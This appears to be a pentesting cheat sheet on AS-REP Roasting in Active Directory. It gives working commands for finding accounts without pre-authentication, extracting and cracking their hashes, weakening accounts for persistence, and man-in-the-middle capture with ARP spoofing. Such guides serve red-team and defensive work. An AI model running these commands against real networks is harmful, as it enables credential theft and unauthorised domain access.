AS-REP Roasting

AS-REP Roasting exploits users who lack the Kerberos pre-authentication required attribute. This vulnerability allows you to request authentication for a user from the Domain Controller without needing their password. The DC responds with a message encrypted with the user's password-derived key, which you can crack offline.

Requirements

• Target users without pre-authentication: Users must not have Kerberos pre-authentication enabled
• Connection to Domain Controller: Access to send requests and receive encrypted messages
• Optional domain account: Having credentials allows efficient identification of vulnerable users via LDAP queries

Workflow

1. Enumerate Vulnerable Users

If you have domain credentials, enumerate users without pre-authentication:

Windows (PowerView):

Get-DomainUser -PreauthNotRequired -verbose

Linux (bloodyAD):

bloodyAD -u user -p 'password' -d domain --host dc_ip get search \
  --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' \
  --attr sAMAccountName

Linux (Kerbrute - for user enumeration):

kerbrute userenum users.txt -d domain --dc dc.domain

2. Request AS-REP Hashes

Linux (Impacket GetNPUsers.py):

# Try all usernames from a file
python GetNPUsers.py domain/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast

# Use domain credentials to extract and target vulnerable users
python GetNPUsers.py domain/user:password -request -format hashcat -outputfile hashes.asreproast

Windows (Rubeus):

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast /user:username

Windows (ASREPRoast.ps1):

Get-ASREPHash -Username VPN114user -verbose

Warning: AS-REP Roasting with Rubeus generates Event ID 4768 with encryption type 0x17 and preauth type 0.

Linux (NetExec - quick one-liner):

# Pull AS-REP for a single user even with blank password
netexec ldap <dc> -u svc_scan -p '' --asreproast out.asreproast

3. Crack the Hashes

John the Ripper:

john --wordlist=passwords_kerb.txt hashes.asreproast

Hashcat:

hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Hashcat auto-detects mode 18200 (etype 23) for AS-REP roast hashes.

4. Persistence (If You Have GenericAll Permissions)

Force pre-authentication not required for a user where you have write permissions:

Windows (PowerView):

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

Linux (bloodyAD):

bloodyAD -u user -p 'password' -d domain --host dc_ip add uac -f DONT_REQ_PREAUTH 'target_user'

AS-REP Roasting Without Credentials

If you have a man-in-the-middle position, you can capture AS-REP packets as they traverse the network without relying on pre-authentication being disabled. This works for all users on the VLAN.

ASRepCatcher:

# Act as proxy between clients and DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disable ARP spoofing (MITM position obtained differently)
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen

Quick Reference

Get-DomainUser -PreauthNotRequired

bloodyAD ... get search --filter '...4194304...'

GetNPUsers.py domain/ -usersfile users.txt -format hashcat

Rubeus.exe asreproast /format:hashcat

john --wordlist=rockyou.txt hashes.asreproast

hashcat -m 18200 hashes.asreproast rockyou.txt

Set-DomainObject -XOR @{useraccountcontrol=4194304}

bloodyAD ... add uac -f DONT_REQ_PREAUTH

Tools Required

• Impacket (GetNPUsers.py) - Python-based Kerberos tools
• Rubeus - .NET Kerberos tool for Windows
• PowerView - PowerShell AD reconnaissance
• Hashcat or John the Ripper - Password cracking
• bloodyAD - Linux AD management tool
• ASRepCatcher - MITM AS-REP capture

References

• Ired.team - AS-REP Roasting with Rubeus and Hashcat
• 0xdf - HTB Bruno (AS-REP roast → ZipSlip → DLL hijack)
• ASRepCatcher on GitHub
• ASREPRoast.ps1 on GitHub